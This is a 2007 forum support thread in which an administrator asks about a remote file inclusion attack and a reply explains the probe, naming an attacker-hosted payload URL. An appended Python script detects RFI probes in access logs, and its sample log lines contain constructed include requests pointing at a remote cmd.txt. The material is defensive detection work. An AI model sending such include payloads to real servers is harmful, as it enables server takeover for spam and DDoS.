Support :: Feedback :: remote file inclusion attack |
|||
| By: pjssms |
Date: 23/10/2007 20:32:03 |
Points: 0 | Status: Answered Quality : Excellent |
|
Hello, I would like to know more details about the attack from 85.17.116xxx. I am the server administrator and I would like to fix the issue and prevent the situation. Thank you, Paulo Santos |
|||
| By: VGR | Date: 26/10/2007 23:42:52 | Type : Comment |
|
| Hi, sorry for the delay in noticing your message. The 85.17.116.* machine is used to remotely test one server (this one) as vulnerable to RFI attacks, in order to use it for spamming or participating in DDoS attacks for sure. The attack (or probe) vector involves trying to reach a file situated on another server; in our case http://201.37.71.117:8090/cmd.txt. That file was dropped in using other security holes, mainly permissive upload scripts, like in a lot of blog or forum packages. Closing the hole on your side involves either patching your software for known RFI or "open http relay" vulnerabilities, or killing viral processes in case you got infected by a worm (sh*t happens and then it hits the fan). I don't have many more details to provide, because this server is invulnerable so far, but I'm willing to send you a list of people who said "we fixed the problem", so that you may contact them. You'll have an email soon. Regards |
|||
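The probe described in the reply above appears in a web server access log as a request whose query parameter value is itself a URL on another host. The following is an added example, not part of the original thread, that scans Combined Log Format lines for that pattern; the log lines, host names, script names and parameter names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# A parameter value that starts with a scheme points at another server.
REMOTE_RE = re.compile(r"^(?:https?|ftps?)://", re.IGNORECASE)

# Constructed sample lines (documentation IPs, hypothetical hosts and scripts).
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Oct/2007:20:01:12 +0200] '
    '"GET /index.php?page=http://remote.example:8090/cmd.txt? HTTP/1.1" 200 5120',
    '203.0.113.7 - - [23/Oct/2007:20:01:13 +0200] '
    '"GET /view.php?inc=http%3A%2F%2Fremote.example%3A8090%2Fcmd.txt HTTP/1.1" 404 312',
    '198.51.100.20 - - [23/Oct/2007:20:02:00 +0200] '
    '"GET /index.php?page=about HTTP/1.1" 200 2048',
    '198.51.100.20 - - [23/Oct/2007:20:02:05 +0200] '
    '"GET /search?q=what+is+http HTTP/1.1" 200 1024',
]

def remote_params(target):
    """Return (name, value) pairs whose value is a URL on another host."""
    hits = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        value = unquote(value).strip()
        if REMOTE_RE.match(value):
            hits.append((name, value))
    return hits

def find_rfi_probes(lines):
    """Return one finding per remote-URL parameter seen in the log lines."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a Combined Log Format request line
        ip, when, _method, target, status = m.groups()
        for name, value in remote_params(target):
            findings.append({"ip": ip, "time": when, "param": name,
                             "remote": value, "status": int(status)})
    return findings

if __name__ == "__main__":
    for f in find_rfi_probes(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['param']}={f['remote']} -> HTTP {f['status']}")
```

A 404 only shows that the targeted script does not exist, and a 200 does not by itself prove the include ran, so flagged requests that hit existing scripts are the ones to review first.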








